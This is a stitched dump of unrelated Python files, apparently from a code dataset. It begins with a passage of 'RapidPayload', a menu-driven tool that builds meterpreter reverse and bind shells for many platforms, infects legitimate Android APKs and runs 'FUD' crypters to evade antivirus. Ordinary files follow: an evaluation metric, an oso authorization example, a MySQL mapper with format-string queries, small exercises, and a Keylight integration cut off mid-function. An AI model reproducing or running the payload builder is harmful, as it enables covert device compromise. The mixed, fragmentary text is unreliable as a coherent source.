os.system("chmod +x "+wi2+".exe")
elif type == '9':
print("\033[1m\033[36m")
os.system("ls")
wi11=input("\n{0}{1}RapidPayload:~/File# {2}".format(cyan, bold, end))
wi22=input("\n{0}{1}RapidPayload:~/NewFileName# {2}".format(cyan, bold, end))
dirtt=os.getcwd()
os.system("cp -r "+dirtt+"/Hyperion/Fasm "+dirtt+"/")
os.system("cp -r "+dirtt+"/Hyperion/Src "+dirtt+"/")
os.system("cp "+dirtt+"/Hyperion/hyperion.exe "+dirtt+"/")
print("\033[1m\033[36m")
os.system("wine hyperion.exe "+wi11+" "+wi22+".exe")
print("\033[1m\033[36m")
os.system("ls")
os.system("rm -rf Fasm")
os.system("rm -rf Src")
os.system("rm -rf hyperion.exe")
else:
main('Windows', type)
if select == '2':
type = input('{2}{1}\n\n{0}{2}[{1}{2}1{0}]{1} {2} linux/x86/meterpreter/reverse_http\n{0}[{1}{2}2{0}]{1} {2} linux/x86/meterpreter/reverse_https\n{0}[{1}{2}3{0}]{1} {2} linux/x86/meterpreter/reverse_tcp{0}{1}\n{0}[{1}{2}4{0}]{1} {2} linux/x64/meterpreter/reverse_http{0}{1}\n{0}[{1}{2}5{0}]{1} {2} linux/x64/meterpreter/reverse_https{0}{1}\n{0}[{1}{2}6{0}]{1} {2} linux/x64/meterpreter/reverse_tcp\n{0}[{1}{2}7{0}]{1} {2} linux/x86/shell/reverse_tcp{0}\n{0}[{1}{2}8{0}]{1} {2} linux/x64/shell/bind_tcp\n{0}[{1}{2}9{0}]{1} {2} linux/x86/meterpreter/bind_tcp\n{0}[{1}{2}10{0}]{1} {2}linux/x64/meterpreter/bind_tcp\n{0}[{1}{2}11{0}]{1} {2}linux/x86/shell/bind_tcp\n{0}[{1}{2}12{0}]{1} {2}linux/x64/shell/reverse_tcp\n{0}[{1}{2}0{0}]{1} {2} Menu\n\n{0}{2}RapidPayload:~/Linux#{1} '.format(cyan, end, bold))
if type == '0':
banner()
RapidP()
main('Linux', type)
if select == '3':
droi = input('{2}{1}\n\n{0}{2}[{1}{2}1{0}]{1} {2}Normal\n{0}[{1}{2}2{0}]{1} {2}Infect Legitimate APK\n{0}{0}[{1}{2}0{0}]{1} {2}{2}Menu\n\n{0}{2}RapidPayload:~/Android#{1} '.format(cyan, end, bold))
if droi == '1':
type = input('{2}{1}\n\n{0}{2}[{1}{2}1{0}]{1} {2}android/meterpreter/reverse_http\n{0}[{1}{2}2{0}]{1} {2}android/meterpreter/reverse_https\n{0}[{1}{2}3{0}]{1} {2}android/meterpreter/reverse_tcp\n{0}[{1}{2}0{0}]{1} {2}{2}Menu\n\n{0}{2}RapidPayload:~/Android#{1} '.format(cyan, end, bold))
if type == '0':
banner()
RapidP()
Normal('Android', type)
if droi == '2':
type = input('{2}{1}\n\n{0}{2}[{1}{2}1{0}]{1} {2}android/meterpreter/reverse_http\n{0}[{1}{2}2{0}]{1} {2}android/meterpreter/reverse_https\n{0}[{1}{2}3{0}]{1} {2}android/meterpreter/reverse_tcp\n{0}[{1}{2}0{0}]{1} {2}{2}Menu\n\n{0}{2}RapidPayload:~/Android#{1} '.format(cyan, end, bold))
if type == '0':
banner()
RapidP()
legit('Android', type)
if select == '4':
type = input('{2}{1}\n\n{0}{2}[{1}{2}1{0}]{1} {2}python/meterpreter/reverse_http\n{0}[{1}{2}2{0}]{1} {2}python/meterpreter/reverse_https\n{0}[{1}{2}3{0}]{1} {2}python/meterpreter/reverse_tcp\n{0}[{1}{2}4{0}]{1} {2}python/meterpreter/bind_tcp\n{0}[{1}{2}5{0}]{1} {2}Crypter_FUD\n{0}[{1}{2}6{0}]{1} {2}Crypter_NXcrypter\n{0}[{1}{2}0{0}]{1} {2}Menu\n\n{0}{2}RapidPayload:~/Python#{1} '.format(cyan, end, bold))
if type == '0':
banner()
RapidP()
elif type == '5':
print("\033[1m\033[36m")
os.system("ls")
print("")
namepyfud=input("\n{0}{1}RapidPayload:~/File# {2}".format(cyan, bold, end))
dirtt=os.getcwd()
print("\033[1m\033[36m")
os.system("chmod +x "+dirtt+"py_fud.py")
os.system("python "+dirtt+"py_fud.py "+namepyfud)
print("\n{0}{1}RapidPayload:~/Save#FUD_python_RapidPayload.py {2}".format(cyan, bold, end))
elif type == '6':
print("\033[1m\033[36m")
os.system("ls")
print("")
namepyfud1=input("\n{0}{1}RapidPayload:~/File# {2}".format(cyan, bold, end))
namepyfud2=input("\n{0}{1}RapidPayload:~/NewFileName# {2}".format(cyan, bold, end))
dirtt=os.getcwd()
print("\033[1m\033[36m")
os.system("chmod +x "+dirtt+"nx.py")
os.system("python "+dirtt+"nx.py --file="+namepyfud1+" --out="+namepyfud2+".py")
print("\033[1m\033[36m")
os.system("ls")
os.system("chmod +x "+namepyfud2+".py")
else:
main('Python', type)
if select == '5':
type = input('{2}{1}\n\n{0}{2}[{1}{2}1{0}]{1} {2}osx/x86/shell_reverse_tcp\n{0}[{1}{2}2{0}]{1} {2}osx/x86/shell_bind_tcp\n{0}[{1}{2}3{0}]{1} {2}osx/x64/meterpreter/bind_tcp\n{0}[{1}{2}4{0}]{1} {2}osx/x64/meterpreter/reverse_tcp\n{0}[{1}{2}5{0}]{1} {2}osx/x64/meterpreter_reverse_http\n{0}[{1}{2}6{0}]{1} {2}osx/x64/meterpreter_reverse_https\n{0}[{1}{2}0{0}]{1} {2}Menu\n\n{0}{2}RapidPayload:~/MacOS#{1} '.format(cyan, end, bold))
if type == '0':
banner()
RapidP()
main('Macosx', type)
if select == '6':
type = input('{2}{1}\n\n{0}{2}[{1}{2}1{0}]{1} {2}java/meterpreter/reverse_http\n{0}[{1}{2}2{0}]{1} {2}java/meterpreter/reverse_https\n{0}[{1}{2}3{0}]{1} {2}java/meterpreter/reverse_tcp\n{0}[{1}{2}4{0}]{1} {2}java/meterpreter/bind_tcp\n{0}[{1}{2}0{0}]{1} {2}Menu\n\n{0}{2}RapidPayload:~/Java#{1} '.format(cyan, end, bold))
if type == '0':
banner()
RapidP()
main('Java', type)
if select == '7':
type = input('{2}{1}\n\n{0}{2}[{1}{2}1{0}]{1} {2}apple_ios/aarch64/meterpreter_reverse_http\n{0}[{1}{2}2{0}]{1} {2}apple_ios/aarch64/meterpreter_reverse_https\n{0}[{1}{2}3{0}]{1} {2}apple_ios/aarch64/meterpreter_reverse_tcp\n{0}[{1}{2}4{0}]{1} {2}apple_ios/aarch64/shell_reverse_tcp\n{0}[{1}{2}5{0}]{1} {2}apple_ios/armle/meterpreter_reverse_http\n{0}[{1}{2}6{0}]{1} {2}apple_ios/armle/meterpreter_reverse_https\n{0}{2}[{1}{2}1{0}]{1} {2}apple_ios/armle/meterpreter_reverse_tcp\n{0}[{1}{2}0{0}]{1} {2}Menu\n\n{0}{2}RapidPayload:~/Apple_ios#{1} '.format(cyan, end, bold))
if type == '0':
banner()
RapidP()
main('Apple_ios', type)
if select == '8':
Ngrok()
if select == '9':
localhost()
if select == '10':
MSF()
elif select == '0':
print("\n")
os.system("fuser -k -n tcp 80") # kill PORT 80
exit(0)
else:
sleep(2)
banner()
RapidP()
if __name__ == "__main__":
try:
banner()
RapidP()
except KeyboardInterrupt:
print("\n")
exit(0)
| 44.804979 | 810 | 0.533941 |
f0801b7de6532b77a49b919db668beaa5aa03cd5
| 2,853 |
py
|
Python
|
research/nlp/dam/src/ubuntu_evaluation.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/nlp/dam/src/ubuntu_evaluation.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/nlp/dam/src/ubuntu_evaluation.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===========================================================================
"""Precision calculation function of Ubuntu data"""
def get_p_at_n_in_m(data, n, m, ind):
"""Former n recall rate"""
pos_score = data[ind][0]
curr = data[ind:ind + m]
curr = sorted(curr, key=lambda x: x[0], reverse=True)
if curr[n - 1][0] <= pos_score:
return 1
return 0
def evaluate(file_path):
"""
Evaluation is done through a score file.
:param file_path: Score file path.
:return: A tuple of accuracy
"""
data = []
with open(file_path, 'r') as file:
for line in file:
line = line.strip()
tokens = line.split("\t")
if len(tokens) != 2:
continue
data.append((float(tokens[0]), int(tokens[1])))
# assert len(data) % 10 == 0
p_at_1_in_2 = 0.0
p_at_1_in_10 = 0.0
p_at_2_in_10 = 0.0
p_at_5_in_10 = 0.0
length = int(len(data) / 10)
for i in range(0, length):
ind = i * 10
assert data[ind][1] == 1
p_at_1_in_2 += get_p_at_n_in_m(data, 1, 2, ind)
p_at_1_in_10 += get_p_at_n_in_m(data, 1, 10, ind)
p_at_2_in_10 += get_p_at_n_in_m(data, 2, 10, ind)
p_at_5_in_10 += get_p_at_n_in_m(data, 5, 10, ind)
return (p_at_1_in_2 / length, p_at_1_in_10 / length, p_at_2_in_10 / length, p_at_5_in_10 / length)
def evaluate_m(logits, labels):
"""
Evaluate through network output.
:param logits: Network score.
:param labels: Actual label
:return: A tuple of accuracy
"""
data = []
for i in range(len(logits)):
data.append((float(logits[i]), int(labels[i])))
# assert len(data) % 10 == 0
p_at_1_in_2 = 0.0
p_at_1_in_10 = 0.0
p_at_2_in_10 = 0.0
p_at_5_in_10 = 0.0
length = int(len(data) / 10)
for i in range(0, length):
ind = i * 10
assert data[ind][1] == 1
p_at_1_in_2 += get_p_at_n_in_m(data, 1, 2, ind)
p_at_1_in_10 += get_p_at_n_in_m(data, 1, 10, ind)
p_at_2_in_10 += get_p_at_n_in_m(data, 2, 10, ind)
p_at_5_in_10 += get_p_at_n_in_m(data, 5, 10, ind)
return (p_at_1_in_2 / length, p_at_1_in_10 / length, p_at_2_in_10 / length, p_at_5_in_10 / length)
| 29.112245 | 102 | 0.609534 |
0411d539c0ed6a946aa0e8a373b3d59fb4edc3cf
| 990 |
py
|
Python
|
DataStructure/U2/Lecture/Number_extended.py
|
qiaw99/Data-Structure
|
3b1cdce96d4f35329ccfec29c03de57378ef0552
|
[
"MIT"
] | 1 |
2019-10-29T08:21:41.000Z
|
2019-10-29T08:21:41.000Z
|
DataStructure/U2/Lecture/Number_extended.py
|
qiaw99/Data-Structure
|
3b1cdce96d4f35329ccfec29c03de57378ef0552
|
[
"MIT"
] | null | null | null |
DataStructure/U2/Lecture/Number_extended.py
|
qiaw99/Data-Structure
|
3b1cdce96d4f35329ccfec29c03de57378ef0552
|
[
"MIT"
] | null | null | null |
from functools import total_ordering
import numbers
@total_ordering
class Number_extended:
def __init__(self,value,side=None):
self.v=value
self.side=side
def __eq__(self,other):
if isinstance(other,numbers.Number):
return self.v==other and self.side==None
elif isinstance(other,Number_extended):
return self.v==other.v and self.side==other.side
def __lt__(self,other):
if isinstance(other,numbers.Number):
return (self.v<other or
(self.v==other and self.side==-1))
elif isinstance(other,Number_extended):
return (self.v<other.v or
(self.v==other.v and
(self.side,other.side) in ((-1,None),(-1,+1),(None,+1))))
a = Number_extended(5,+1)
print("a<5 ", a<5)
print("a>5 ", a>5)
print("a==5", a==5)
print("5>a ", 5>a)
print("5<a ", 5<a)
print("5==a", 5==a)
print("a==a", a==a)
print("a<a ", a<a)
print("a<=a", a<=a)
print("a+1 ", a+1)
| 29.117647 | 73 | 0.579798 |
f0e76a10944b6a5331226c127a51572d884114b4
| 3,165 |
py
|
Python
|
src/server/db/RoleMapper.py
|
muenstermannmarius/ElectionSystem
|
a6e60d9147423787e869587b808def4771f89cb7
|
[
"RSA-MD"
] | null | null | null |
src/server/db/RoleMapper.py
|
muenstermannmarius/ElectionSystem
|
a6e60d9147423787e869587b808def4771f89cb7
|
[
"RSA-MD"
] | null | null | null |
src/server/db/RoleMapper.py
|
muenstermannmarius/ElectionSystem
|
a6e60d9147423787e869587b808def4771f89cb7
|
[
"RSA-MD"
] | null | null | null |
import mysql.connector
from server.Role import Role
from server.db.Mapper import Mapper
class RoleMapper (Mapper):
"""This is a mapper-class, which represents role objects into
a relational database. For this reason you can find some methods,
which help to find, insert, modify, and delete objects. The mapping is
bidirectional, which means objects can be transformed into database structures
and the other way around"""
def __init__(self):
super().__init__()
def find_all(self):
"""Reads out all roles.
:return A collection of role objects that repesent all roles.
"""
result = []
cursor = self._connection.cursor()
cursor.execute("SELECT * FROM Role")
tuples = cursor.fetchall()
for (id, name) in tuples:
role = Role()
role.set_id(id)
role.set_name(name)
result.append(role)
self._connection.commit()
cursor.close()
return result
def find_by_id(self, id):
"""Reads out one role by id.
:param id Unique id of the role
:return A role object, which has the required id.
"""
result = None
cursor = self._connection.cursor()
command = "SELECT * FROM Role WHERE id={}".format(id)
cursor.execute(command)
tuples = cursor.fetchall()
for (id, name) in tuples:
role = Role()
role.set_id(id)
role.set_name(name)
result = role
self._connection.commit()
cursor.close()
return result
def insert(self, role):
"""Adds a role object into the database.
The primary key of the object gets checked and if neccessary adjusted.
:param role object which will be saved
:return role object with the changed id
"""
cursor = self._connection.cursor()
cursor.execute("SELECT MAX(id) AS maxid FROM Role")
tuples = cursor.fetchall()
for (maxid) in tuples:
if maxid[0] is not None:
role.set_id(maxid[0] + 1)
else:
role.set_id(1)
command = "INSERT INTO Role (id, name) VALUES (%s,%s)"
data = (role.get_id(), role.get_name())
cursor.execute(command, data)
self._connection.commit()
cursor.close()
return role
def update(self, role):
"""Updates a role object in the database.
:param role object which will be updated
"""
cursor = self._connection.cursor()
command = "UPDATE Role " + "SET name=%s WHERE id=%s"
data = (role.get_name(), role.get_id())
cursor.execute(command, data)
self._connection.commit()
cursor.close()
def delete(self, role):
"""Deletes a role object from the database.
:param role object which will be deleted
"""
cursor = self._connection.cursor()
command = "DELETE FROM Role WHERE id={}".format(role.get_id())
cursor.execute(command)
self._connection.commit()
cursor.close()
| 29.036697 | 82 | 0.580095 |
9bf912a03a898b6c2d47184fcf45a74ca52c39d4
| 303 |
py
|
Python
|
Prediction/main.py
|
Nivram710/Seretra
|
dc7a509ff37e07ea4688a87ab89d13783299c069
|
[
"Apache-2.0"
] | 2 |
2018-04-12T14:24:33.000Z
|
2020-09-16T07:03:28.000Z
|
Prediction/main.py
|
Nivram710/Seretra
|
dc7a509ff37e07ea4688a87ab89d13783299c069
|
[
"Apache-2.0"
] | null | null | null |
Prediction/main.py
|
Nivram710/Seretra
|
dc7a509ff37e07ea4688a87ab89d13783299c069
|
[
"Apache-2.0"
] | null | null | null |
from collision import find_collision
from predict import predict
from read import read_data
from interpolate import interpolate
from show import show
from parser import parse
import time
DANGER_PATH = ".danger/"
while True:
parse("Seretra/Prediction/main.srt")
print("done")
time.sleep(1)
| 20.2 | 40 | 0.775578 |
acc11e32a302cb938903ff9dcab5418db04048e1
| 638 |
py
|
Python
|
Packs/GoogleChronicleBackstory/Scripts/ListDeviceEventsScript/ListDeviceEventsScript.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/GoogleChronicleBackstory/Scripts/ListDeviceEventsScript/ListDeviceEventsScript.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/GoogleChronicleBackstory/Scripts/ListDeviceEventsScript/ListDeviceEventsScript.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
from CommonServerPython import *
asset_identifier = demisto.args().get('asset_identifier')
asset_identifier_type = 'Host Name'
if is_mac_address(asset_identifier):
asset_identifier_type = 'MAC Address'
if is_ip_valid(asset_identifier, accept_v6_ips=True):
asset_identifier_type = 'IP Address'
result = demisto.executeCommand('gcb-list-events',
{
'asset_identifier': asset_identifier,
'asset_identifier_type': asset_identifier_type
}
)
demisto.results(result)
| 35.444444 | 82 | 0.589342 |
acc7c909cc3147f22fe103a85af5063c26ab266a
| 3,259 |
py
|
Python
|
examples/expenses-py/app.py
|
saschajullmann/oso
|
85d07c6a1825acba5ec043c917bff6e0f5c7128f
|
[
"Apache-2.0"
] | 1 |
2021-07-08T17:36:08.000Z
|
2021-07-08T17:36:08.000Z
|
examples/expenses-py/app.py
|
saschajullmann/oso
|
85d07c6a1825acba5ec043c917bff6e0f5c7128f
|
[
"Apache-2.0"
] | 2 |
2021-03-24T19:24:40.000Z
|
2021-03-24T19:54:46.000Z
|
examples/expenses-py/app.py
|
saschajullmann/oso
|
85d07c6a1825acba5ec043c917bff6e0f5c7128f
|
[
"Apache-2.0"
] | 1 |
2021-03-24T19:51:45.000Z
|
2021-03-24T19:51:45.000Z
|
"""
Example application integrated with oso.
The application does not currently do much except define application
data structures that might already exist in, for example, a database.
"""
# External imports
from oso import Oso, polar_class
# Stdlib imports
import os
from pathlib import Path
import sys
# Local imports
from data import *
@polar_class
class User:
"""User model"""
# username
name: str
# global role
role: str
# user's location
location: str
def __init__(self, name="", role="", location=""):
self.name = name
self.role = role
self.location = location
@classmethod
def by_name(cls, name=""):
"""Lookup method to get a `User` object from the string name"""
if name in USERS:
return User(name, **USERS[name])
else:
# empty/non-existing user
return User()
def employees(self):
"""Returns the employees managed by this user"""
if self.name in MANAGERS:
for name in MANAGERS[self.name]:
yield User.by_name(name)
@polar_class
class Expense:
"""Expense model"""
def __init__(self, amount: int, submitted_by: str, location: str, project_id: int):
self.amount = amount
self.submitted_by = submitted_by
self.location = location
self.project_id = project_id
@classmethod
def id(cls, id: int):
if id < len(EXPENSES):
return Expense(**EXPENSES[id])
else:
return Expense()
@polar_class
class Project:
"""Project model"""
def __init__(self, team_id: int):
self.team_id = team_id
@classmethod
def id(cls, id: int):
if id < len(PROJECTS):
return Project(**PROJECTS[id])
else:
return Project()
@polar_class
class Team:
"""Team model"""
def __init__(self, organization_id: int):
self.organization_id = organization_id
@classmethod
def id(cls, id: int):
if id < len(TEAMS):
return Team(**TEAMS[id])
else:
return Team()
@polar_class
class Organization:
"""Organization model"""
def __init__(self, name: str):
self.name = name
@classmethod
def id(cls, id: int):
if id < len(ORGANIZATIONS):
return Organization(**ORGANIZATIONS[id])
else:
return Organization()
@polar_class
class Env:
"""Helper class for oso, looks up environment variables"""
@classmethod
def var(cls, variable):
return os.environ.get(variable, None)
def load_oso():
"""Loads and returns the oso policy"""
oso = Oso()
policy_path = Path(__file__).resolve().parent.parent / "expenses"
## Policy Data
oso.load_file(policy_path / "data.polar")
## Role definitions
oso.load_file(policy_path / "roles.polar")
## ABAC policy
oso.load_file(policy_path / "abac.polar")
return oso
if __name__ == "__main__":
"""Loads and checks the policy.
Run example with `python app.py repl` to run the REPL after loading
the policy.
"""
oso = load_oso()
print("Policy loaded OK")
if len(sys.argv) > 1 and sys.argv[1] == "repl":
oso.repl()
| 22.02027 | 87 | 0.606321 |
a8470cc0bcf8909810b2d2fb66353d7f6a89e60a
| 318 |
py
|
Python
|
Programming Languages/Python/Theory/100_Python_Challenges/Section_4_Dictionary/74. map two lists into a dictionary.py
|
jaswinder9051998/Resources
|
fd468af37bf24ca57555d153ee64693c018e822e
|
[
"MIT"
] | 101 |
2021-12-20T11:57:11.000Z
|
2022-03-23T09:49:13.000Z
|
Programming Languages/Python/Theory/100_Python_Challenges/Section_4_Dictionary/74. map two lists into a dictionary.py
|
Sid-1164/Resources
|
3987dcaeddc8825f9bc79609ff26094282b8ece1
|
[
"MIT"
] | 4 |
2022-01-12T11:55:56.000Z
|
2022-02-12T04:53:33.000Z
|
Programming Languages/Python/Theory/100_Python_Challenges/Section_4_Dictionary/74. map two lists into a dictionary.py
|
Sid-1164/Resources
|
3987dcaeddc8825f9bc79609ff26094282b8ece1
|
[
"MIT"
] | 38 |
2022-01-12T11:56:16.000Z
|
2022-03-23T10:07:52.000Z
|
"""
Write a Python function to map two lists into a dictionary.
list1 contains the keys, list2 contains the values.
Input lists:
list1 = [1,2,3,4,5]
list2 = [6,7,8,9,10]
Expected output: {1: 6, 2: 7, 3: 8, 4: 9, 5: 10}
"""
#Solution is:
def map_lists(list1,list2):
return (dict(zip(list1,list2)))
| 16.736842 | 60 | 0.632075 |
a8c4c7e70a2ae7c2df8023aed85c416da9216dd1
| 251 |
py
|
Python
|
exercises/pt/exc_01_02_02.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 2,085 |
2019-04-17T13:10:40.000Z
|
2022-03-30T21:51:46.000Z
|
exercises/pt/exc_01_02_02.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 79 |
2019-04-18T14:42:55.000Z
|
2022-03-07T08:15:43.000Z
|
exercises/pt/exc_01_02_02.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 361 |
2019-04-17T13:34:32.000Z
|
2022-03-28T04:42:45.000Z
|
# Importe a classe do idioma alemão (German)
from spacy.lang.____ import ____
# Crie um objeto nlp
nlp = ____
# Processe o texto (equivalente ao português: "Atenciosamente")
doc = nlp("Liebe Grüße!")
# Imprima o texto do documento
print(____.text)
| 20.916667 | 63 | 0.741036 |
76878e49793555b3817e63c2273a4d0a827f9b30
| 630 |
py
|
Python
|
WebHostLib/api/__init__.py
|
Berserker66/ALttPEntranceRandomizer
|
9c681cc65d7281ccded03484b050e8f80ea65dc6
|
[
"MIT"
] | null | null | null |
WebHostLib/api/__init__.py
|
Berserker66/ALttPEntranceRandomizer
|
9c681cc65d7281ccded03484b050e8f80ea65dc6
|
[
"MIT"
] | 5 |
2020-01-18T21:10:46.000Z
|
2020-01-25T20:58:19.000Z
|
WebHostLib/api/__init__.py
|
Berserker66/ALttPEntranceRandomizer
|
9c681cc65d7281ccded03484b050e8f80ea65dc6
|
[
"MIT"
] | 2 |
2020-01-18T17:36:50.000Z
|
2020-01-22T16:52:08.000Z
|
"""API endpoints package."""
from uuid import UUID
from flask import Blueprint, abort
from ..models import Room
api_endpoints = Blueprint('api', __name__, url_prefix="/api")
from . import generate, user # trigger registration
# unsorted/misc endpoints
@api_endpoints.route('/room_status/<suuid:room>')
def room_info(room: UUID):
room = Room.get(id=room)
if room is None:
return abort(404)
return {"tracker": room.tracker,
"players": room.seed.multidata["names"],
"last_port": room.last_port,
"last_activity": room.last_activity,
"timeout": room.timeout}
| 25.2 | 61 | 0.663492 |
8caeaa7740c0ef79bffd514cba373283cc8521fc
| 27,141 |
py
|
Python
|
Packs/Lokpath_Keylight/Integrations/Lockpath_KeyLight_v2/Lockpath_KeyLight_v2.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/Lokpath_Keylight/Integrations/Lockpath_KeyLight_v2/Lockpath_KeyLight_v2.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/Lokpath_Keylight/Integrations/Lockpath_KeyLight_v2/Lockpath_KeyLight_v2.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
from datetime import datetime, timedelta
from typing import Union
import traceback
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
FILTER_DICT = {'Contains': '1',
'Excludes': '2',
'Starts With': '3',
'Ends With': '4',
'Equals': '5',
'Not Equals': '6',
'Greater Than': '7',
'Less Than': '8',
'Greater Equals Than': '9',
'Less Equals Than': '10',
'Between': '11',
'Not Between': '12',
'Is Null': '15',
'Is Not Null': '16'}
INTEGRATION_CONTEXT_SIZE = 15
'''CLIENT'''
class Client(BaseClient):
@logger
def _http_request(self, method, url_suffix, full_url=None, headers=None,
auth=None, json_data=None, params=None, data=None, files=None,
timeout=10, resp_type='json', ok_codes=None, **kwargs):
res = super()._http_request(method=method, url_suffix=url_suffix, full_url=full_url, headers=headers,
auth=auth, json_data=json_data, params=params, data=data, files=files,
timeout=timeout, resp_type=resp_type, ok_codes=ok_codes, **kwargs)
return res
def login(self, username: str, password: str) -> bool:
"""
Logs in to the server and keeps the cookie as header.
Args:
username:
password:
Returns:
Returns if connection was successful.
"""
body = {
'username': username,
'password': password
}
res = self._http_request('POST', '/SecurityService/Login', resp_type='response', json_data=body)
successful = res.content == b'true'
return successful
def logout(self):
"""
Logs out of the connection.
"""
self._http_request('GET', '/SecurityService/Logout')
def return_components(self, link: str, params: dict = None) -> None:
res = self._http_request('GET', link, params=params)
if isinstance(res, dict):
res['ID'] = res.pop('Id')
else:
for comp in res:
comp['ID'] = comp.pop('Id')
ec = {'Keylight.Component(val.ID && val.ID==obj.ID))': res}
hr = tableToMarkdown("Keylight Components", res)
return_outputs(hr, ec, res)
def return_fields(self, suffix: str, params: dict = None, title: str = None) -> None:
"""
Runs and returns field commands according to the suffix .
Args:
suffix: which api call to make
params: if the command neads a params this are them
title: The title for the table to markdown
Returns:
"""
res = self._http_request('GET', suffix, params=params)
if isinstance(res, dict):
res['ID'] = res.pop('Id')
else:
for field in res:
field['ID'] = field.pop('Id')
ec = {'Keylight.Field(val.ID && val.ID==obj.ID))': res}
hr = tableToMarkdown(title,
res, ['ID', 'Name', 'SystemName', 'ShortName', 'ReadOnly', 'Required'])
return_outputs(hr, ec, res)
def return_records(self, component_id: str, record_id: str, field_names: str,
suffix: str) -> None:
"""
Returns to demisto record calls according to suffix
Args:
component_id: The component IF
record_id: which record to return
field_names: what fields to return
suffix: The suffix for the API request
Returns:
None
"""
params = {'componentID': component_id,
'recordId': record_id}
res = self._http_request('GET', suffix, params=params)
field_names = argToList(field_names)
all_fields = self.field_output_to_hr_fields(res.get('FieldValues', []), component_id, field_names)
record = {'ID': res.get('Id'),
'ComponentID': component_id,
'DisplayName': res.get('DisplayName', '')
}
hr = tableToMarkdown(f'Details for record {record.get("DisplayName")}:', record)
hr += tableToMarkdown('With the following fields:', all_fields)
record['Fields'] = all_fields
ec = {'Keylight.Record(val.ID && val.ID==obj.ID))': record}
return_outputs(hr, ec, res)
def return_filtered_records(self, component_id: str, page_size: str, page_index: str, suffix: str,
filter_type: str = None, filter_field_id: str = None, filter_value: str = None) -> dict:
"""
Args:
component_id: component id
page_size: how many results to return per page
page_index: what page number
suffix: API suffix
filter_type: What filter to apply (out of FILTER_DICT
filter_field_id: which field to apply the filter on
filter_value: the filter value
Returns:
number of records according to a certain query made up of filter_type, filter_value and filter_field_id
"""
data = {'componentId': component_id,
'pageIndex': page_index,
'pageSize': page_size}
if filter_type:
data['filters'] = [create_filter(filter_type, filter_value, filter_field_id)] # type: ignore
else:
data['filters'] = [] # type: ignore
res = self._http_request('POST', suffix, json_data=data)
for result in res:
result['ID'] = result.pop('Id')
result['ComponentID'] = component_id
return res
def change_record(self, component_id: str, record_id: Union[str, None] = None,
record_json: dict = None) -> None:
json_data = {
'componentId': component_id,
'dynamicRecord': {
'FieldValues': self.string_to_FieldValues(record_json, component_id)
}
}
suffix = '/ComponentService/CreateRecord'
if record_id:
json_data['dynamicRecord']['Id'] = record_id # type: ignore
suffix = '/ComponentService/UpdateRecord'
res = self._http_request('POST', suffix, json_data=json_data)
fields = self.field_output_to_hr_fields(res.get('FieldValues', []), component_id)
record = {'ID': res.get('Id'),
'ComponentID': component_id,
'DisplayName': res.get('DisplayName', '')
}
hr = tableToMarkdown(f'Task "{record.get("DisplayName")}":', record)
hr += tableToMarkdown('With the following fields:', fields)
record['Fields'] = fields
ec = {'Keylight.Record(val.ID && val.ID==obj.ID))': record}
return_outputs(hr, ec, res)
'''HELPER CLIENT FUNCTIONS'''
def component_id_from_name(self, name: str) -> str:
"""
Args:
name: Name of component
Returns:
The component ID
"""
component_list = self._http_request('GET', '/ComponentService/GetComponentList')
component = {} # type: dict
for comp in component_list:
if comp.get('Name') == name:
component = comp
return str(component.get('Id'))
def field_id_from_name(self, name: str, component_id: str) -> Union[str, None]:
"""
Args:
name: The field's name
component_id:
Returns:
The field_id if it exists
"""
field_map = demisto.getIntegrationContext().get(str(component_id))
if not field_map:
self.update_field_integration_context(component_id)
field_map = demisto.getIntegrationContext().get(str(component_id))
fields = field_map.get('fields')
for field_key, field_name in fields.items():
if field_name == name:
return field_key
return None
@logger
def update_field_integration_context(self, component_id: str) -> None:
"""
update integration context to include the component_id and have at most 7 tables stored
Update policy : FIFO
Integration context will look: {
component_id: {
last_update: $date
fields: {field_key: field_name.
field_key, field_name,
...,
}
}
}
Args:
component_id: The id of the component we want to add to the integration context
Returns: None
"""
field_map = demisto.getIntegrationContext()
if field_map.get(str(component_id)):
field_map.pop(str(component_id))
params = {'componentId': component_id}
